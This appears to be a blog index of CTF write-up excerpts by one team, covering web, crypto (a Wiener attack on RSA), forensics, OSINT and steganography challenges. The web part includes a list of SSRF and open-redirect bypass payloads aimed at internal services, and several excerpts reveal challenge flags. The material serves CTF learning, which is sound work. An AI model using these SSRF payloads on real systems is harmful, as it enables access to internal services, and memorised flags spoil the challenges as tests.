Web Writeups Hello there we (fr334aks) took part in hackpack CTF 2021 and ended up solving all the available Web challenges, here are our writeups for them. “N"ot “G"am"I"ng a"N"ymore in “X"mas Challenge Solution tried a random name as password and used the network tab in dev options to inspect the requests found a post request with data as debug=0 changed that to debug=1 as and which revealed the default nginx.

SSRF Hello there,below is a list of most common SSRF payloads and open-redirect bypasses SSRF & Open Redirect Bypass With [::], abuses IPV6 http://[::]/ http://[::]:80/ http://[::]:25/ SMTP http://[::]:22/ SSH http://[::]:3128/ Squid http://0000::1/ http://0000::1:80/ http://0000::1:25/ SMTP http://0000::1:22/ SSH http://0000::1:3128/Squid With domain redirection, useful when all IP addresses are blacklisted http://localtest.me http://test.app.127.0.0.1.nip.io http://test-app-127-0-0-1.nip.io httP://test.app.127.0.0.1.xip.io With CIDR, useful when just 127.0.0.1 is whitelisted http://127.127.127.127/ http://127.0.1.3/ https:/127.0.0.0/ With IPv6/IPv4 address embedding, useful when both IPv4 and IPv6 are blacklisted (but blacklisted badly) http://[0:0:0:0:0:ffff:127.

Hello there,Angstrom 2021 just concluded,with that here are some of writeups that i happened to have a hand in solving and found them interesting. Sosig we are given the following numbers to retreive the flag from,having no source file we kick into research on RSA encryption, this challenge has a weird length of the exponent (e), on researching we found out it might be vulnerable to a Weiner Attack n: 14750066592102758338439084633102741562223591219203189630943672052966621000303456154519803347515025343887382895947775102026034724963378796748540962761394976640342952864739817208825060998189863895968377311649727387838842768794907298646858817890355227417112558852941256395099287929105321231423843497683829478037738006465714535962975416749856785131866597896785844920331956408044840947794833607105618537636218805733376160227327430999385381100775206216452873601027657796973537738599486407175485512639216962928342599015083119118427698674651617214613899357676204734972902992520821894997178904380464872430366181367264392613853 e: 1565336867050084418175648255951787385210447426053509940604773714920538186626599544205650930290507488101084406133534952824870574206657001772499200054242869433576997083771681292767883558741035048709147361410374583497093789053796608379349251534173712598809610768827399960892633213891294284028207199214376738821461246246104062752066758753923394299202917181866781416802075330591787701014530384229203479804290513752235720665571406786263275104965317187989010499908261009845580404540057576978451123220079829779640248363439352875353251089877469182322877181082071530177910308044934497618710160920546552403519187122388217521799 c: 13067887214770834859882729083096183414253591114054566867778732927981528109240197732278980637604409077279483576044261261729124748363294247239690562657430782584224122004420301931314936928578830644763492538873493641682521021685732927424356100927290745782276353158739656810783035098550906086848009045459212837777421406519491289258493280923664889713969077391608901130021239064013366080972266795084345524051559582852664261180284051680377362774381414766499086654799238570091955607718664190238379695293781279636807925927079984771290764386461437633167913864077783899895902667170959671987557815445816604741675326291681074212227 We first verify that the Wiener attack can be applied:

Shakti took place over the weekend and I happened to miss out, but i got a memory forensics challenge before it ended and i found it interesting Challenge Help Me 400 re memory Our department had taken up the responsibility of solving a mysterious case but unfortunately our system crashed. We could only recover this memory dump. Your job is get all the important files from the system and use the files to find out the secret informatiom.

Forbidden points 100 challenge description Agent Troll recieved some file but not able to read the data can you help us? Author: White_Wolf Forbidden (link is dead but file is attached) solution we are given a trollcats.car $file trollcats.car trollcats.car: data on further investigation $binwalk trollcats.car DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 50 0x32 bzip2 compressed data, block size = 900k extracting the file $binwalk -e trollcats.car DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 50 0x32 bzip2 compressed data, block size = 900k ┌─[@parrot]─[~/Desktop/CTFs/TrollCAT/Forensics] └──╼ $cd _trollcats.

RaziCTF-Writeups Holloway Holloway OSINT Challenge Solution following the provided challenge link https://dikelaw535.wixsite.com/holloway we are met with the following web page that ain’t good :/ no Secrets yet … hh but again maybe it was there but deleted :) checking through using Wayback Machine we get something a twitter handle @juliusKingsleyy following the link https://twitter.com/juliusKingsleyy we are met with the following page, just a weird looking tweet aha! the challenge name is a hint for Twitter Steganography technique.

Echoes of Reality Challenge Solution challenge was quite easy and direct opening the file in sonic visualizer gives us the flag hidden in the spectogram flag: flag{b3h1Nd_tH3_l0ok1nG_gl4s5} Granular Data Challenge Solution also an easy challenge the flag was hidden in metadata/exifdata exiftool Garrett.png gives the flag flag : flag{h4t3d_1n_th3_n4t10n_0MTBu} Zima Blue Misc/Steg points 100 Challenge Solution This was an interesting Stega challenge, opening the file in Stegsolve gives us the flag in plain text